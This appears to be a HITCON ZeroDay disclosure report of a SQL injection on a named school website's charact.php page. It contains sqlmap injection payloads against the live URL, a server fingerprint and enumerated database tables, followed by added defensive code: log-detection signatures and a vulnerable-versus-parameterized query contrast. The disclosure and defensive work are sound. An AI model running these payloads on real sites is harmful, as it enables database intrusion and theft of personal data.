奥莱尔双语学校 SQL vulnerability - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00408
  • Vendor: TACERT (台灣學術網路危機處理中心, Taiwan Academic Network Computer Emergency Response Team)
  • Title: 奥莱尔双语学校 SQL vulnerability
  • Introduction: 奥莱尔双语学校 SQL

Handling Status

Current status

Public
Last update: 2018/06/06
  • New submission
  • Reviewed
  • Reported to vendor
  • Fix status not reported
  • Not retested
  • Public

Processing History

  • 2018/04/06 23:55:02 : New submission (status updated by Cra5h)
  • 2018/04/07 00:28:07 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 00:28:09 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:11:38 : Fix in progress (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:11:39 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:11:40 : Fix in progress (status updated by the HITCON ZeroDay service team)
  • 2018/06/06 03:00:25 : Public (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2018-00408
  • Reporter: cra5h (Cra5h)
  • Risk: High
  • Type: Database injection attack (SQL Injection)

References

An attacker can exploit this vulnerability to gain access to the back-end database and its complete contents (including large amounts of users' personal or sensitive data), and may also be able to destroy or modify that data.

Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(This field is generated automatically by the system from the vulnerability category and serves as reference material.)

Related URLs

http://www.cornell.tyc.edu.tw/charact.php?id=39

Description

奥莱尔双语学校 SQL
SQL injection location:
http://www.cornell.tyc.edu.tw/charact.php?id=39

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=39 AND 9160=9160

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=39 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=-4551 UNION ALL SELECT NULL,NULL,CONCAT(0x716a627871,0x644650745057776e7377687769526e4757704d765179544249667378704d4654744f73466d77564f,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lSVL

[22:50:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[22:50:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'
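The three sqlmap findings above (boolean-based blind, time-based blind, UNION) each leave a recognisable shape in the web server's access log. The following is an added detection example, not part of the report or the platform: it parses Apache combined-format lines and flags requests whose decoded query string matches one of those three families. The log lines are constructed (documentation-range IP, invented timestamps and user agent) to mirror the payload shapes shown in the report.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-log lines (203.0.113.x is a documentation range; timestamps
# and user agents are invented). They reproduce the request shapes sqlmap reported above.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Apr/2018:22:49:58 +0800] "GET /charact.php?id=39 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [06/Apr/2018:22:50:03 +0800] "GET /charact.php?id=39%20AND%209160%3D9160 HTTP/1.1" 200 5120 "-" "sqlmap/1.2"
203.0.113.10 - - [06/Apr/2018:22:50:11 +0800] "GET /charact.php?id=39%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/1.2"
203.0.113.10 - - [06/Apr/2018:22:50:20 +0800] "GET /charact.php?id=-4551%20UNION%20ALL%20SELECT%20NULL,NULL--%20lSVL HTTP/1.1" 200 3011 "-" "sqlmap/1.2"
"""

# client, timestamp, method, request target, status; the rest of the line is ignored.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# One signature per technique family in the sqlmap output. They run over the URL-decoded
# query string, so percent-encoding or '+' for space does not hide the keywords.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),   # AND 9160=9160 tautology
    "time-blind":    re.compile(r"\bSLEEP\s*\(", re.I),                # AND SLEEP(5)
    "union":         re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}


def classify_query(query):
    """Return the names of the signature families present in a raw query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Parse combined-log lines; return (client, timestamp, path, families) for flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, ts, _method, target, _status = m.groups()
        parts = urlsplit(target)
        families = classify_query(parts.query)
        if families:
            hits.append((client, ts, parts.path, families))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The first (benign) line is not flagged; the other three each map to exactly one family. Matching on the decoded query rather than the raw URL is the important design choice: the boolean payload in the report arrives as `39%20AND%209160%3D9160`, which no keyword search on the raw line would catch.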

Confirmed affected databases: (3)
available databases [3]:
[*] cornell
[*] information_schema
[*] test

[22:51:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'

Checking data volume:
Database: cornell
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| goods_img                             | 199320  |
| member_log                            | 26456   |
| goods_img3                            | 3938    |
| goods_img2                            | 3284    |
| product                               | 1062    |
| member                                | 963     |
| sms_history                           | 266     |
| product1                              | 117     |
| productclass                          | 92      |
| faq                                   | 82      |
| contactus1                            | 46      |
| productclass1                         | 46      |
| download                              | 18      |
| suite                                 | 16      |
| project                               | 15      |
| about_manage                          | 13      |
| news                                  | 12      |
| link                                  | 10      |
| attribute1                            | 8       |
| downloadclass                         | 8       |
| projectclass                          | 8       |
| attribute2                            | 7       |
| contactus                             | 6       |
| contactus2                            | 5       |
| admin                                 | 3       |
| attribute                             | 3       |
| myorders                              | 3       |
| mytype                                | 3       |
| mytype1                               | 3       |
| suite_group                           | 3       |
| controltype                           | 2       |
| member_group                          | 2       |
| mytype2                               | 2       |
| newsclass                             | 2       |
| sms_text                              | 2       |
| yesorno                               | 2       |
| admin_group                           | 1       |
| book                                  | 1       |
| company                               | 1       |
| mails                                 | 1       |
| setup                                 | 1       |
+---------------------------------------+---------+

Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| address                               | 379     |
| customer                              | 291     |
| courses_regist                        | 130     |
| courses_date                          | 95      |
| courses                               | 88      |
| news                                  | 46      |
| album_img                             | 37      |
| knowledge                             | 32      |
| suite                                 | 23      |
| goods                                 | 14      |
| banner                                | 6       |
| goods_level                           | 6       |
| suite_group                           | 6       |
| links                                 | 5       |
| download                              | 4       |
| about_us                              | 3       |
| album                                 | 3       |
| courses_status                        | 3       |
| download_type                         | 2       |
| message                               | 2       |
| new1                                  | 2       |
| admin                                 | 1       |
| admin_group                           | 1       |
| banner_set                            | 1       |
| books                                 | 1       |
| core                                  | 1       |
| fbook_file                            | 1       |
| message_schedule                      | 1       |
| seo                                   | 1       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1218    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 110     |
| TABLES                                | 110     |
| STATISTICS                            | 98      |
| KEY_COLUMN_USAGE                      | 67      |
| TABLE_CONSTRAINTS                     | 67      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

[22:52:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.cornell.tyc.edu.tw'

Remediation Suggestion

Filtering, parameterization.
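The remediation above names two controls, input filtering and parameterized queries. The following is an added example, not code from the reporter or from the affected site, showing both applied to a lookup of the same shape as `charact.php?id=`. It uses an in-memory sqlite3 database as a stand-in for the MySQL back end; the `charact` table, its columns and rows are constructed for the example. The vulnerable function reproduces the defect class (the parameter spliced into the SQL text) only so that the contrast with the hardened handler is visible on the report's own boolean-blind payload.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database: sqlite3 in memory, invented table and rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE charact (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO charact VALUES (?, ?)",
                     [(38, "page 38"), (39, "page 39"), (40, "page 40")])
    return conn


def lookup_vulnerable(conn, raw_id):
    # The defect class in the report: the GET parameter becomes part of the SQL text,
    # so anything after the number is executed as SQL and the response leaks a yes/no oracle.
    return conn.execute(f"SELECT id, title FROM charact WHERE id={raw_id}").fetchall()


def lookup_parameterized(conn, raw_id):
    # Hardened: the value is bound as a parameter, compared as data and never parsed as SQL.
    return conn.execute("SELECT id, title FROM charact WHERE id=?", (raw_id,)).fetchall()


def validate_id(raw):
    # Allow-list filter for an id that must be a short positive integer; None means reject.
    if not isinstance(raw, str) or not raw.isdigit() or len(raw) > 9:
        return None
    return int(raw)


def handle_request(conn, raw_id):
    # What the page handler should do: validate first, then bind. Returns (http_status, rows).
    uid = validate_id(raw_id)
    if uid is None:
        return 400, []
    rows = lookup_parameterized(conn, uid)
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    db = make_db()
    true_probe, false_probe = "39 AND 9160=9160", "39 AND 9160=9161"
    # Vulnerable handler: the two probes give different answers, which is the blind oracle.
    print(lookup_vulnerable(db, true_probe), lookup_vulnerable(db, false_probe))
    # Hardened handler: both probes are rejected before any SQL runs; a plain id still works.
    print(handle_request(db, true_probe), handle_request(db, false_probe), handle_request(db, "39"))
```

Parameterization alone already defeats the payload (binding `39 AND 9160=9160` as a value matches no row), but the integer allow-list in `validate_id` is still worth keeping: it rejects malformed input with a 400 before a query is issued, which is cheaper and gives a clean signal in the application log.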
